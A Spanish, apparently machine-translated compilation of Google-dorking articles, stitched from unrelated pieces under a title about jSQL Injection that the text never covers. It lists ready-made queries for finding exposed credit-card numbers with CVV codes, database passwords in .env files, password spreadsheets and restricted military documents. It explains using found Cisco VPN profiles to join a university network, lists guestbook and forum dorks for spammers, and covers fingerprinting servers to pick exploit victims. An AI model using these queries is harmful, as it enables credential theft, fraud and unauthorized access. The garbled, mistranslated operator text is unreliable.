Instrucciones para usar jSQL Injection, una herramienta multifuncional para encontrar y explotar inyecciones de SQL en Kali Linux. Uso de las funciones poco conocidas de Google para encontrar usos ocultos de Google como escáner CGI

Recibir datos privados no siempre significa piratear, a veces se publica en Acceso público. Conocimiento Configuración de Google y un poco de ingenio le permitirá encontrar muchas cosas interesantes, desde números de tarjetas de crédito hasta documentos del FBI.

ADVERTENCIA

Toda la información se proporciona únicamente con fines informativos. Ni los editores ni el autor son responsables de los posibles daños causados ​​por los materiales de este artículo.

Hoy todo está conectado a Internet, preocupándose poco por restringir el acceso. Por lo tanto, muchos datos privados se convierten en presa de los motores de búsqueda. Los robots araña ya no se limitan a las páginas web, sino que indexan todo el contenido disponible en la Web y agregan constantemente información confidencial a sus bases de datos. Aprender estos secretos es fácil: solo necesita saber cómo preguntar sobre ellos.

buscando archivos

En manos capaces, Google encontrará rápidamente todo lo que está mal en la Web, como información personal y archivos para uso oficial. A menudo se ocultan como una llave debajo de una alfombra: no hay restricciones de acceso reales, los datos solo se encuentran en la parte posterior del sitio, donde los enlaces no conducen. La interfaz web estándar de Google solo proporciona ajustes básicos búsqueda avanzada, pero incluso esos serán suficientes.

Hay dos operadores que puede usar para restringir las búsquedas de Google a archivos de cierto tipo: filetype y ext . El primero establece el formato que el motor de búsqueda determina por el encabezado del archivo, el segundo - la extensión del archivo, independientemente de su contenido interno. Al buscar en ambos casos, debe especificar solo la extensión. Inicialmente, el operador ext era conveniente para usar en casos en los que no había características de formato específicas para el archivo (por ejemplo, para buscar archivos de configuración ini y cfg, que pueden contener cualquier cosa). Ahora algoritmos de Google cambiado, y no hay diferencia visible entre los operadores; los resultados son los mismos en la mayoría de los casos.


Filtrado de la salida

De forma predeterminada, Google busca palabras y, en general, cualquier carácter ingresado en todos los archivos en las páginas indexadas. Puede limitar el alcance de la búsqueda por el dominio de nivel superior, un sitio específico o por la ubicación de la secuencia deseada en los propios archivos. Para las dos primeras opciones se utiliza la declaración del sitio, seguida del nombre del dominio o del sitio seleccionado. En el tercer caso, todo un conjunto de operadores le permite buscar información en campos de servicio y metadatos. Por ejemplo, allinurl encontrará lo especificado en el cuerpo de los enlaces mismos, allinanchor - en el texto provisto con la etiqueta , allintitle - en los encabezados de página, allintext - en el cuerpo de las páginas.

Para cada operador hay una versión más ligera con un nombre más corto (sin el prefijo all). La diferencia es que allinurl encontrará enlaces con todas las palabras, mientras que inurl solo encontrará enlaces con la primera de ellas. La segunda y posteriores palabras de la consulta pueden aparecer en cualquier lugar de las páginas web. El operador inurl también difiere de otro similar en significado-sitio. El primero también le permite encontrar cualquier secuencia de caracteres en el enlace al documento deseado (por ejemplo, /cgi-bin/), que es muy utilizado para encontrar componentes con vulnerabilidades conocidas.

Intentémoslo en la práctica. Tomamos el filtro allintext y hacemos que la consulta devuelva una lista de números de tarjetas de crédito y códigos de verificación, que caducan solo después de dos años (o cuando sus dueños se cansan de alimentar a todos seguidos).

Allintext: fecha de caducidad del número de tarjeta /2017 cvv

Cuando lees en las noticias que un joven hacker "hackeó los servidores" del Pentágono o de la NASA, robando información clasificada, en la mayoría de los casos es precisamente esta técnica elemental de usar Google. Supongamos que estamos interesados ​​en una lista de empleados de la NASA y sus datos de contacto. Seguramente tal lista está en formato electrónico. Por comodidad o por un descuido, también puede estar en la propia web de la organización. Es lógico que en este caso no haya referencias al mismo, ya que está destinado a un uso interno. ¿Qué palabras pueden estar en tal archivo? Al menos - el campo "dirección". Es fácil probar todas estas suposiciones.


inurl:nasa.gov tipo de archivo:xlsx "dirección"


Usamos la burocracia

Tales hallazgos son una bagatela agradable. La captura realmente sólida proviene de un conocimiento más detallado de los operadores de webmasters de Google, la Web misma y la estructura de lo que está buscando. Al conocer los detalles, puede filtrar fácilmente la salida y refinar las propiedades de los archivos que necesita para obtener datos realmente valiosos en el resto. Es gracioso que la burocracia venga al rescate aquí. Produce formulaciones típicas que facilitan la búsqueda de información secreta que se ha filtrado accidentalmente en la Web.

Por ejemplo, el sello de declaración de distribución, que es obligatorio en la oficina del Departamento de Defensa de EE. UU., significa restricciones estandarizadas en la distribución de un documento. La letra A marca comunicados públicos en los que no hay nada secreto; B: destinado solo para uso interno, C: estrictamente confidencial, y así sucesivamente hasta F. Por separado, está la letra X, que marca información especialmente valiosa que representa un secreto de estado del más alto nivel. Deje que aquellos que se supone que deben hacerlo de turno busquen dichos documentos, y nos limitaremos a los archivos con la letra C. Según DoDI 5230.24, dicha marca se asigna a documentos que contienen una descripción de tecnologías críticas que están bajo control de exportación. Puede encontrar esta información cuidadosamente protegida en sitios en el dominio de nivel superior .mil asignado al Ejército de EE. UU.

"DECLARACIÓN DE DISTRIBUCIÓN C" inurl:navy.mil

Es muy conveniente que solo los sitios del Departamento de Defensa de EE. UU. y sus organizaciones contratadas se recopilen en el dominio .mil. Los resultados de búsqueda de dominio limitado son excepcionalmente limpios y los títulos hablan por sí mismos. Es prácticamente inútil buscar secretos rusos de esta manera: el caos reina en los dominios .ru y .rf, y los nombres de muchos sistemas de armas suenan como botánicos (PP "Kiparis", armas autopropulsadas "Acacia") o incluso fabuloso (TOS "Pinocho").


Al examinar cuidadosamente cualquier documento de un sitio en el dominio .mil, puede ver otros marcadores para refinar su búsqueda. Por ejemplo, una referencia a las restricciones de exportación "Sec 2751", que también es conveniente para buscar información técnica interesante. De vez en cuando, se elimina de los sitios oficiales, donde una vez apareció, por lo que si no puede seguir un enlace interesante en los resultados de búsqueda, use el caché de Google (operador de caché) o el sitio web de Internet Archive.

Subimos a las nubes

Además de los documentos desclasificados accidentalmente de los departamentos gubernamentales, ocasionalmente aparecen en la memoria caché de Google enlaces a archivos personales de Dropbox y otros servicios de almacenamiento de datos que crean enlaces "privados" a datos publicados públicamente. Es aún peor con los servicios alternativos y de fabricación propia. Por ejemplo, la siguiente consulta encuentra los datos de todos los clientes de Verizon que tienen un servidor FTP instalado y usan activamente un enrutador en su enrutador.

Allinurl:ftp://verizon.net

Ahora hay más de cuarenta mil personas tan inteligentes, y en la primavera de 2015 había un orden de magnitud más. En lugar de Verizon.net, puede sustituir el nombre de cualquier proveedor conocido, y cuanto más famoso sea, mayor será la trampa. A través del servidor FTP incorporado, puede ver archivos en una unidad externa conectada al enrutador. Por lo general, se trata de un NAS para trabajo remoto, una nube personal o algún tipo de descarga de archivos punto a punto. Google y otros motores de búsqueda indexan todo el contenido de dichos medios, por lo que puede acceder a los archivos almacenados en unidades externas a través de un enlace directo.

Configuraciones de espionaje

Antes de la migración masiva a las nubes, los servidores FTP simples, que también carecían de vulnerabilidades, gobernaban como almacenamientos remotos. Muchos de ellos siguen siendo relevantes hoy en día. Por ejemplo, el popular programa WS_FTP Professional almacena datos de configuración, cuentas de usuario y contraseñas en el archivo ws_ftp.ini. Es fácil de encontrar y leer porque todas las entradas se almacenan en texto sin formato y las contraseñas se cifran mediante el algoritmo Triple DES después de una ofuscación mínima. En la mayoría de las versiones, basta con descartar el primer byte.

Descifrar tales contraseñas es fácil usando la utilidad WS_FTP Password Decryptor o un servicio web gratuito.

Cuando se habla de piratear un sitio arbitrario, generalmente se refieren a obtener una contraseña de registros y copias de seguridad de CMS o archivos de configuración de aplicaciones de comercio electrónico. Si conoce su estructura típica, puede indicar fácilmente palabras clave. Las líneas como las que se encuentran en ws_ftp.ini son extremadamente comunes. Por ejemplo, Drupal y PrestaShop siempre tienen una identificación de usuario (UID) y una contraseña correspondiente (pwd), y toda la información se almacena en archivos con la extensión .inc. Puedes buscarlos así:

"pwd=" "UID=" ext:inc

Revelamos contraseñas del DBMS

En los archivos de configuración de los servidores SQL, nombres y direcciones Correo electrónico los usuarios se almacenan en texto claro y sus hashes MD5 se escriben en lugar de contraseñas. Descifrarlos, estrictamente hablando, es imposible, pero puede encontrar una coincidencia entre los pares de hash-contraseña conocidos.

Hasta ahora, hay DBMS que ni siquiera usan hash de contraseña. Los archivos de configuración de cualquiera de ellos pueden verse simplemente en el navegador.

Intext: DB_PASSWORD tipo de archivo: env

Con la llegada de los servidores Windows, el registro ocupó en parte el lugar de los archivos de configuración. Puede buscar a través de sus sucursales exactamente de la misma manera, usando reg como tipo de archivo. Por ejemplo, así:

Tipo de archivo:reg HKEY_CURRENT_USER "Contraseña"=

No olvides lo obvio

A veces es posible acceder a información clasificada con la ayuda de datos abiertos y capturados accidentalmente por Google. La opción ideal es encontrar una lista de contraseñas en algún formato común. Almacene la información de la cuenta en Archivo de texto, Documento de Word o electrónico hoja de cálculo de Excel Solo las personas desesperadas pueden hacerlo, pero siempre hay suficientes.

Tipo de archivo:xls inurl:contraseña

Por un lado, hay muchos medios para prevenir este tipo de incidentes. Es necesario especificar derechos de acceso adecuados en htaccess, parchear CMS, no usar scripts dejados y cerrar otros agujeros. También hay un archivo con una lista de exclusión de robots.txt, que prohíbe que los motores de búsqueda indexen los archivos y directorios especificados en él. Por otro lado, si la estructura de robots.txt en algún servidor difiere de la estándar, inmediatamente queda claro lo que están tratando de ocultar en él.

La lista de directorios y archivos en cualquier sitio está precedida por el índice de inscripción estándar de. Dado que debe aparecer en el título para fines de servicio, tiene sentido limitar su búsqueda al operador intitle. Se pueden encontrar cosas interesantes en los directorios /admin/, /personal/, /etc/ e incluso /secret/.

Sigue las actualizaciones

La relevancia es extremadamente importante aquí: las vulnerabilidades antiguas se cierran muy lentamente, pero Google y sus resultados de búsqueda cambian constantemente. Incluso hay una diferencia entre el filtro de "último segundo" (&tbs=qdr:s al final de la URL de solicitud) y el filtro de "tiempo real" (&tbs=qdr:1).

Intervalo de tiempo de fecha última actualización El archivo de Google también se indica implícitamente. A través de la interfaz web gráfica, puede seleccionar uno de los períodos típicos (hora, día, semana, etc.) o establecer un rango de fechas, pero este método no es adecuado para la automatización.

A partir de la apariencia de la barra de direcciones, uno solo puede adivinar una forma de limitar la salida de resultados usando la construcción &tbs=qdr:. La letra y después especifica un límite de un año (&tbs=qdr:y), m muestra los resultados del último mes, w de la semana, d del último día, h de la última hora, n del minuto, y s para el dame un segundo. Los resultados más recientes que se acaban de dar a conocer a Google se encuentran utilizando el filtro &tbs=qdr:1.

Si necesita escribir un script complicado, será útil saber que el rango de fechas se establece en Google en formato juliano a través del operador de rango de fechas. Por ejemplo, así es como puede encontrar una lista de documentos PDF con la palabra confidencial cargados entre el 1 de enero y el 1 de julio de 2015.

Tipo de archivo confidencial: intervalo de fechas en pdf: 2457024-2457205

El rango se especifica en formato de fecha juliana sin decimales. Es inconveniente traducirlos manualmente del calendario gregoriano. Es más fácil usar un convertidor de fechas.

Orientación y filtrado de nuevo

Además de especificar operadores adicionales en la consulta de búsqueda, se pueden enviar directamente en el cuerpo del enlace. Por ejemplo, el rasgo filetype:pdf corresponde a la construcción as_filetype=pdf. Por lo tanto, es conveniente establecer cualquier aclaración. Digamos que la salida de resultados solo de la República de Honduras se establece agregando la construcción cr=countryHN a la URL de búsqueda, pero solo de la ciudad de Bobruisk - gcs=Bobruisk. Consulte la sección de desarrolladores para obtener una lista completa de .

Las herramientas de automatización de Google están diseñadas para hacer la vida más fácil, pero a menudo aumentan la molestia. Por ejemplo, la ciudad de un usuario está determinada por la IP del usuario a través de WHOIS. Con base en esta información, Google no solo equilibra la carga entre servidores, sino que también cambia los resultados de búsqueda. Dependiendo de la región, para la misma consulta, diferentes resultados llegarán a la primera página, y algunos de ellos pueden quedar completamente ocultos. Siéntete un cosmopolita y busca información de cualquier país te ayudará su código de dos letras después de la directiva gl=country. Por ejemplo, el código para los Países Bajos es NL, mientras que el Vaticano y Corea del Norte no tienen su propio código en Google.

A menudo, los resultados de búsqueda se ensucian incluso después de usar algunos filtros avanzados. En este caso, es fácil refinar la consulta agregando algunas palabras de excepción (cada una de ellas está precedida por un signo menos). Por ejemplo, banca, nombres y tutorial se usan a menudo con la palabra Personal. Por lo tanto, los resultados de búsqueda más limpios no mostrarán un ejemplo de libro de texto de una consulta, sino uno refinado:

Título:"Índice de /Personal/" -nombres -tutorial -banca

Último ejemplo

Un hacker sofisticado se distingue por el hecho de que él mismo se provee de todo lo que necesita. Por ejemplo, una VPN es algo conveniente, pero costoso o temporal y con restricciones. Registrarse solo para usted es demasiado costoso. Es bueno que haya suscripciones grupales, pero con Google Es fácil ser parte de un grupo. Para hacer esto, solo busque el archivo de configuración de Cisco VPN, que tiene una extensión PCF bastante no estándar y una ruta reconocible: Archivos de programa\Cisco Systems\VPN Client\Profiles. Una solicitud y se unirá, por ejemplo, al amable personal de la Universidad de Bonn.

Tipo de archivo: pcf vpn O Grupo

INFORMACIÓN

Google encuentra archivos de configuración con contraseñas, pero muchos de ellos están encriptados o reemplazados con hashes. Si ve cadenas de una longitud fija, busque inmediatamente un servicio de descifrado.

Las contraseñas se almacenan cifradas, pero Maurice Massard ya ha escrito un programa para descifrarlas y lo proporciona de forma gratuita a través de thecampusgeeks.com.

Con la ayuda de Google, se realizan cientos de diferentes tipos de ataques y pruebas de penetración. Hay muchas opciones que afectan a programas populares, formatos de bases de datos principales, numerosas vulnerabilidades de PHP, nubes, etc. Saber exactamente lo que está buscando hace que sea mucho más fácil obtener la información que necesita (especialmente la información que no pretendía hacer pública). Ningún Shodan solo nutre ideas interesantes, pero cualquier base de datos de recursos de red indexados!

Cómo buscar usando google.com

Probablemente todos saben cómo usar un motor de búsqueda como Google =) Pero no todos saben que si redactas correctamente consulta de busqueda con la ayuda de diseños especiales, puede lograr los resultados que está buscando de manera mucho más eficiente y rápida =) En este artículo intentaré mostrar qué y cómo debe hacer para buscar correctamente

Google admite varios operadores de búsqueda avanzada que tienen un significado especial cuando se busca en google.com. Por lo general, estos operadores modifican la búsqueda o incluso le dicen a Google que realice tipos de búsqueda completamente diferentes. Por ejemplo, la construcción Enlace: es un operador especial, y la consulta enlace: www.google.com no le dará una búsqueda normal, sino que encontrará todas las páginas web que tienen enlaces a google.com.
tipos de solicitudes alternativas

cache: Si incluye otras palabras en la consulta, Google resaltará esas palabras incluidas dentro del documento almacenado en caché.
Por ejemplo, caché: www.sitio web mostrará el contenido en caché con la palabra "web" resaltada.

Enlace: la consulta de búsqueda anterior mostrará páginas web que contienen enlaces a la consulta especificada.
Por ejemplo: enlace: www.sitio web mostrará todas las páginas que tienen un enlace a http://www.site

relacionado: Muestra páginas web que están "relacionadas" con la página web especificada.
Por ejemplo, relacionado: www.google.com enumerará las páginas web que son similares página de inicio Google.

información: Request Information: proporcionará alguna información que Google tiene sobre la página web solicitada.
Por ejemplo, información:sitio web mostrará información sobre nuestro foro =) (Armada - Foro de webmasters adultos).

Otras solicitudes de información

definir: La consulta define: proporcionará una definición de las palabras que escriba después de esto, compilada de varias fuentes en línea. La definición será para la frase completa ingresada (es decir, incluirá todas las palabras en la consulta exacta).

cepo: Si inicia una consulta con acciones: Google tratará el resto de los términos de la consulta como cotizaciones bursátiles y vinculará a una página que muestra la información preparada para esos caracteres.
Por ejemplo, acciones: intel yahoo mostrará información sobre Intel y Yahoo. (Tenga en cuenta que debe imprimir los caracteres de las noticias de última hora, no el nombre de la empresa)

Solicitar modificadores

sitio: Si incluye site: en su consulta, Google limitará los resultados a los sitios web que encuentre en ese dominio.
También puede buscar zonas individuales, como ru, org, com, etc. ( sitio: com sitio:ru)

todo en el título: Si ejecuta una consulta con allintitle:, Google limitará los resultados con todas las palabras de consulta en el título.
Por ejemplo, allintitle: búsqueda en google devolverá todas las páginas de búsqueda de Google como imágenes, Blog, etc.

título: Si incluye intitle: en su consulta, Google restringirá los resultados a los documentos que contengan esa palabra en el título.
Por ejemplo, título:Negocio

allinurl: Si ejecuta una consulta con allinurl: Google limitará los resultados con todas las palabras de consulta en la URL.
Por ejemplo, allinurl: búsqueda en google devolverá documentos con google y buscará en el título. Además, como opción, puede separar las palabras con una barra inclinada (/), luego las palabras a ambos lados de la barra inclinada se buscarán dentro de la misma página: Ejemplo allinurl: foo/bar

inurl: Si incluye inurl: en su consulta, Google limitará los resultados a los documentos que contengan esa palabra en la URL.
Por ejemplo, Animación inurl:sitio web

en el texto: busca solo en el texto de la página la palabra especificada, ignorando el título y los textos de los enlaces, y otras cosas no relacionadas. También hay un derivado de este modificador: todo el texto: aquellos. Además, todas las palabras de la consulta se buscarán solo en el texto, lo que también es importante, ignorando las palabras de uso frecuente en los enlaces.
Por ejemplo, texto: foro

rango de fechas: búsquedas en marcos de tiempo (rango de fechas: 2452389-2452389), las fechas para el tiempo se especifican en formato juliano.

Bueno, y todo tipo de ejemplos interesantes de solicitudes.

Ejemplos de compilación de consultas para Google. Para los spammers

inurl:control.invitado?a=signo

Sitio:books.dreambook.com “URL de la página de inicio” “Firmar mi” inurl:firmar

Sitio: www.freegb.net Página de inicio

Inurl:sign.asp "Recuento de caracteres"

"Mensaje:" inurl:sign.cfm "Remitente:"

inurl:register.php “Registro de usuario” “Sitio web”

Inurl:edu/guestbook "Firmar el libro de visitas"

Inurl:post "Publicar comentario" "URL"

Inurl:/archives/ “Comentarios:” “¿Recordar información?”

“Guión y libro de visitas creado por:” “URL:” “Comentarios:”

inurl:?acción=añadir “phpBook” “URL”

Intitle:"Enviar nueva historia"

Revistas

inurl:www.livejournal.com/users/mode=reply

inurl greatjournal.com/mode=respuesta

Inurl:fastbb.ru/re.pl?

inurl: fastbb.ru /re.pl? "Libro de visitas"

blogs

Inurl:blogger.com/comment.g?”postID”"anónimo"

Inurl:typepad.com/ “Publicar un comentario” “¿Recordar información personal?”

Inurl:greatestjournal.com/community/ “Publicar comentario” “direcciones de posteadores anónimos”

“Publicar comentario” “direcciones de posteadores anónimos” -

Título: "Publicar comentario"

Inurl:pirillo.com “Publicar comentario”

Foros

Inurl:gate.html?”name=Foros” “modo=respuesta”

inurl:”foro/publicación.php?modo=respuesta”

inurl:”mes.php?”

inurl:”miembros.html”

inurl:foro/lista de miembros.php?”

Hackeando con Google

Alejandro Antipov

Sistema de búsqueda Google (www.google.com) ofrece muchas opciones de búsqueda. Todas estas características son una herramienta de búsqueda invaluable para un usuario de Internet por primera vez y, al mismo tiempo, un arma de invasión y destrucción aún más poderosa en manos de personas con malas intenciones, incluidos no solo piratas informáticos, sino también delincuentes no informáticos. e incluso terroristas.
(9475 visitas en 1 semana)


Denis Batrankov
denisNOSPAMixi.ru

Atención:Este artículo no es una guía para la acción. Este artículo está escrito para ustedes, administradores de servidores WEB, para que pierdan la falsa sensación de que están a salvo, y finalmente comprendan la insidiosidad de este método de obtener información y se dediquen a proteger su sitio.

Introducción

Por ejemplo, ¡encontré 1670 páginas en 0,14 segundos!

2. Ingresemos otra línea, por ejemplo:

inurl:"auth_user_file.txt"

un poco menos, pero esto ya es suficiente para la descarga gratuita y para adivinar contraseñas (usando el mismo John The Ripper). A continuación daré algunos ejemplos más.

Por lo tanto, debe darse cuenta de que el motor de búsqueda de Google ha visitado la mayoría de los sitios de Internet y ha almacenado en caché la información contenida en ellos. Esta información almacenada en caché le permite obtener información sobre el sitio y el contenido del sitio sin una conexión directa al sitio, simplemente profundizando en la información que Google almacena internamente. Además, si la información en el sitio ya no está disponible, entonces la información en el caché aún se puede conservar. Todo lo que se necesita para este método es conocer algunas palabras clave de Google. Esta técnica se llama Google Hacking.

Por primera vez, apareció información sobre Google Hacking en la lista de correo de Bugtruck hace 3 años. En 2001, un estudiante francés planteó este tema. Aquí hay un enlace a esta carta http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Da los primeros ejemplos de tales solicitudes:

1) Índice de /admin
2) Índice de /contraseña
3) Índice de /correo
4) Índice de / +banques +filetype:xls (para francia...)
5) Índice de / +contraseña
6) Índice de/contraseña.txt

Este tema hizo mucho ruido en la parte de lectura en inglés de Internet recientemente: después de un artículo de Johnny Long publicado el 7 de mayo de 2004. Para un estudio más completo de Google Hacking, le aconsejo que vaya al sitio de este autor http://johnny.ihackstuff.com. En este artículo, solo quiero ponerte al día.

Quién puede usarlo:
- Periodistas, espías y todas aquellas personas a las que les gusta meter la nariz en los asuntos ajenos pueden usar esto para buscar pruebas comprometedoras.
- Los piratas informáticos que buscan objetivos adecuados para la piratería.

Cómo funciona Google.

Para continuar la conversación, permítame recordarle algunas de las palabras clave utilizadas en las consultas de Google.

Buscar usando el signo +

Google excluye de la búsqueda palabras sin importancia, en su opinión. Por ejemplo, palabras interrogativas, preposiciones y artículos en idioma en Inglés: por ejemplo son, de, donde. En ruso, Google parece considerar importantes todas las palabras. Si la palabra se excluye de la búsqueda, Google escribe sobre ella. Para que Google comience a buscar páginas con estas palabras, debe agregar un signo + antes de ellas sin un espacio antes de la palabra. Por ejemplo:

as + de base

Buscar por signo -

Si Google encuentra un gran número de páginas de las que desea excluir páginas con ciertos temas, puede obligar a Google a buscar solo páginas que no contengan ciertas palabras. Para hacer esto, debe indicar estas palabras colocando un signo delante de cada una, sin espacios antes de la palabra. Por ejemplo:

pesca - vodka

Buscar con el signo ~

Es posible que desee buscar no solo la palabra especificada, sino también sus sinónimos. Para hacer esto, preceda la palabra con el símbolo ~.

Encontrar una frase exacta usando comillas dobles

Google busca en cada página todas las apariciones de las palabras que escribió en la cadena de consulta, y no le importa la posición relativa de las palabras, lo principal es que todas las palabras especificadas están en la página al mismo tiempo ( Esta es la acción por defecto). Encontrar frase exacta- debe ir entre comillas. Por ejemplo:

"sujetalibros"

Para tener al menos una de las palabras especificadas, debe especificar operación lógica explícitamente: O. Por ejemplo:

libro seguridad O protección

Además, puede usar el signo * en la cadena de búsqueda para indicar cualquier palabra y. para representar cualquier personaje.

Encontrar palabras con operadores adicionales

Hay operadores de búsqueda que se especifican en la cadena de búsqueda en el formato:

operador: término_búsqueda

Los espacios al lado de los dos puntos no son necesarios. Si inserta un espacio después de dos puntos, verá un mensaje de error, y antes, Google los usará como una cadena de búsqueda normal.
Hay grupos de operadores de búsqueda adicionales: idiomas: indique en qué idioma desea ver el resultado, fecha: limite los resultados de los últimos tres, seis o 12 meses, ocurrencias: indique en qué parte del documento debe buscar la cadena: en todas partes, en el título, en la URL, dominios: busque el sitio especificado o viceversa, exclúyalo de la búsqueda, Búsqueda segura- bloquear sitios que contengan el tipo de información especificado y eliminarlos de las páginas de resultados de búsqueda.
Sin embargo, algunos operadores no necesitan un parámetro adicional, por ejemplo, la consulta " caché: www.google.com" se puede llamar como una cadena de búsqueda completa, y algunas palabras clave, por el contrario, requieren una palabra de búsqueda, por ejemplo " sitio:www.google.com ayuda". A la luz de nuestro tema, veamos siguiendo instrucciones:

Operador

Descripción

¿Requiere un parámetro adicional?

buscar solo el sitio especificado en search_term

buscar solo en documentos con tipo search_term

encontrar páginas que contengan search_term en el título

buscar páginas que contengan todas las palabras search_term en el título

encontrar páginas que contengan la palabra search_term en su dirección

encontrar páginas que contengan todas las palabras search_term en su dirección

Operador sitio: limita la búsqueda solo al sitio especificado, y puede especificar no solo Nombre de dominio sino también la dirección IP. Por ejemplo, ingrese:

Operador Tipo de archivo: restringe las búsquedas a archivos de cierto tipo. Por ejemplo:

A la fecha de este artículo, Google puede buscar en 13 formatos de archivo diferentes:

  • Formato de documento portátil de Adobe (pdf)
  • PostScript de Adobe (ps)
  • Lotus 1-2-3 (semana 1, semana 2, semana 3, semana 4, semana 5, semana, semana, semana)
  • Lotus Word Pro (lwp)
  • MacWrite(mw)
  • Microsoft Excel(xls)
  • Microsoft Power Point (ppt)
  • Microsoft Word(doc)
  • Microsoft Works (semanas, wps, wdb)
  • Escritura de Microsoft (wri)
  • Formato de texto enriquecido (rtf)
  • Flash de onda de choque (swf)
  • Texto (respuesta, txt)

Operador Enlace: muestra todas las páginas que apuntan a la página especificada.
Siempre debe ser interesante ver cuántos lugares en Internet saben de ti. Intentamos:

Operador cache: muestra la versión almacenada en caché de Google del sitio tal como se veía cuando google más reciente visitó esta página una vez. Tomamos cualquier sitio que cambie con frecuencia y buscamos:

Operador título: busca la palabra especificada en el título de la página. Operador todo en el título: es una extensión: busca todas las pocas palabras especificadas en el título de la página. Comparar:

intitle:vuelo a marte
intitle:vuelo intitle:on intitle:marte
allintitle:vuelo a marte

Operador inurl: hace que Google muestre todas las páginas que contienen la cadena especificada en la URL. allinurl: busca todas las palabras en una URL. Por ejemplo:

allinurl:acid_stat_alerts.php

Este comando es especialmente útil para aquellos que no tienen SNORT, al menos pueden ver cómo funciona en un sistema real.

Métodos de piratería de Google

Entonces, descubrimos que, usando una combinación de los operadores y palabras clave anteriores, cualquiera puede recopilar la información necesaria y buscar vulnerabilidades. Estas técnicas a menudo se conocen como Google Hacking.

Mapa del sitio

Puede usar el sitio: declaración para ver todos los enlaces que Google ha encontrado en el sitio. Por lo general, las páginas que se crean dinámicamente mediante secuencias de comandos no se indexan mediante parámetros, por lo que algunos sitios utilizan filtros ISAPI para que los enlaces no tengan el formato /artículo.asp?num=10&dst=5, pero con barras /artículo/abc/num/10/dst/5. Esto se hace para garantizar que el sitio sea generalmente indexado por los motores de búsqueda.

Intentemos:

sitio: www.whitehouse.gov casa blanca

Google cree que cada página de un sitio contiene la palabra casa blanca. Esto es lo que usamos para obtener todas las páginas.
También hay una versión simplificada:

sitio: casablanca.gov

Y la mejor parte es que los camaradas de whitehouse.gov ni siquiera sabían que miramos la estructura de su sitio e incluso miramos las páginas en caché que Google descargó para sí mismo. Esto se puede usar para estudiar la estructura de los sitios y ver el contenido sin que se note por el momento.

Listado de archivos en directorios

Los servidores WEB pueden mostrar listas de directorios de servidores en lugar de los habituales páginas HTML. Esto generalmente se hace para que los usuarios seleccionen y descarguen ciertos archivos. Sin embargo, en muchos casos los administradores no tienen intención de mostrar el contenido de un directorio. Esto ocurre debido a una configuración incorrecta del servidor o falta de página de inicio en el directorio. Como resultado, el hacker tiene la oportunidad de encontrar algo interesante en el directorio y usarlo para sus propios fines. Para encontrar todas esas páginas, es suficiente notar que todas contienen las palabras: índice de en su título. Pero dado que el índice de palabras contiene no solo esas páginas, debemos refinar la consulta y tener en cuenta las palabras clave en la página misma, por lo que consultas como:

intitle:index.of directorio principal
intitle:index.of tamaño del nombre

Dado que la mayoría de las listas de directorios son intencionales, es posible que le resulte difícil encontrar listas fuera de lugar la primera vez. Pero al menos podrá usar los listados para determinar la versión del servidor WEB, como se describe a continuación.

Obtener la versión del servidor WEB.

Conocer la versión del servidor WEB siempre es útil antes de iniciar cualquier ataque de piratas informáticos. Nuevamente, gracias a Google, es posible obtener esta información sin conectarse a un servidor. Si observa detenidamente la lista del directorio, puede ver que allí se muestra el nombre del servidor WEB y su versión.

Apache1.3.29 - Servidor ProXad en trf296.free.fr Puerto 80

Un administrador experimentado puede cambiar esta información, pero, por regla general, es cierto. Por lo tanto, para obtener esta información, basta con enviar una solicitud:

intitle:index.of server.at

Para obtener información para un servidor específico, refinamos la solicitud:

intitle:index.of server.at sitio:ibm.com

O viceversa, estamos buscando servidores que se ejecuten en una versión específica del servidor:

intitle:index.of Apache/2.0.40 Servidor en

Esta técnica puede ser utilizada por un hacker para encontrar una víctima. Si, por ejemplo, tiene un exploit para una determinada versión del servidor WEB, puede encontrarlo y probar el exploit existente.

También puede obtener la versión del servidor consultando las páginas que se instalan de forma predeterminada al instalar una versión nueva del servidor WEB. Por ejemplo, para ver la página de prueba de Apache 1.2.6, simplemente escriba

intitle:Página.de.prueba.para.Apache ¡funcionó!

Además, algunos sistemas operativos instalan e inician inmediatamente el servidor WEB durante la instalación. Sin embargo, algunos usuarios ni siquiera son conscientes de ello. Naturalmente, si ve que alguien no ha eliminado la página predeterminada, entonces es lógico suponer que la computadora no ha sido sujeta a ninguna configuración y probablemente es vulnerable a los ataques.

Intente buscar páginas de IIS 5.0

allintitle:Bienvenido a Servicios de Internet de Windows 2000

En el caso de IIS, puede determinar no solo la versión del servidor, sino también versión de Windows y paquete de servicio.

Otra forma de determinar la versión del servidor WEB es buscar manuales (páginas de ayuda) y ejemplos que se puedan instalar en el sitio por defecto. Los piratas informáticos han encontrado bastantes formas de utilizar estos componentes para obtener acceso privilegiado al sitio. Es por eso que debe eliminar estos componentes en el sitio de producción. Sin mencionar el hecho de que por la presencia de estos componentes puede obtener información sobre el tipo de servidor y su versión. Por ejemplo, busquemos el manual de apache:

inurl:módulos manuales de directivas de apache

Usando Google como un escáner CGI.

El escáner CGI o el escáner WEB es una utilidad para buscar scripts y programas vulnerables en el servidor de la víctima. Estas utilidades necesitan saber qué buscar, para ello cuentan con toda una lista de archivos vulnerables, por ejemplo:

/cgi-bin/cgiemail/uargg.txt
/banner_aleatorio/index.cgi
/banner_aleatorio/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Podemos encontrar cada uno de estos archivos usando Google, adicionalmente usando las palabras index of o inurl con el nombre del archivo en la barra de búsqueda: podemos encontrar sitios con scripts vulnerables, por ejemplo:

allinurl:/random_banner/index.cgi

Con conocimiento adicional, un pirata informático podría explotar una vulnerabilidad de secuencia de comandos y usar la vulnerabilidad para obligar a la secuencia de comandos a servir cualquier archivo almacenado en el servidor. Por ejemplo, un archivo de contraseñas.

Cómo protegerse de ser pirateado a través de Google.

1. No suba datos importantes al servidor WEB.

Incluso si publicó los datos temporalmente, puede olvidarse de ellos o alguien tendrá tiempo de encontrar y tomar estos datos antes de que los borre. no lo hagas Hay muchas otras formas de transferir datos que los protegen del robo.

2. Revise su sitio.

Utilice los métodos descritos para investigar su sitio. Revise su sitio periódicamente para conocer los nuevos métodos que aparecen en el sitio http://johnny.ihackstuff.com. Recuerda que si quieres automatizar tus acciones, necesitas obtener un permiso especial de Google. Si lees atentamente http://www.google.com/terms_of_service.html, luego verá la frase: No puede enviar consultas automáticas de ningún tipo al sistema de Google sin el permiso expreso y previo de Google.

